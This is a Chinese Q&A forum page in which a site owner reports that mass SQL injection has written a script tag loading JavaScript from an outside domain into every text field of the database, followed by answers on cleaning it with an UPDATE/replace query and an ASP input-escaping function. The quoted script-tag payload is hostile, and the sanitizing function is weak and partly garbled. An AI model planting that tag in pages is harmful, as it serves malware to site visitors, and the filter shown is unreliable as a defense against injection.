sql 数据库中被写入<script>代码

来源:百度知道 编辑:UC知道 时间:2024/05/08 09:02:43
我的网站数据库中字符类型的字段都被被木马写入了<script><http://www.chkbnr.com/b.js></script>代码,如何处理这样问题,急急!有解决的继续加分
更新后还是被写入,如何解决这样的问题?

update 表名 set 字段名=replace(字段名,'要替换的','替换为的')

有备份的话。。恢复下。。
另外你页面也屏蔽一些特殊字符比如<>%'"这些。。
防止sql注入。。

'对接收的数据进行处理,我使用的是下面的函数
function lq_code_html(lq_code_html_tmp)
if not isnull(lq_code_html_tmp) then
'使用HTMLENCODE对HTML标签进行文本处理
lq_code_html_tmp=server.htmlencode(lq_code_html_tmp)
'替换特殊字符
lq_code_html_tmp=replace(lq_code_html_tmp,"\","\")
lq_code_html_tmp=replace(lq_code_html_tmp,"'","'")
lq_code_html_tmp=replace(lq_code_html_tmp,vbCrlf,"<br>")
lq_code_html = lq_code_html_tmp
end if
end function
'处理使用
aa=lq_code_html(Request("aa"))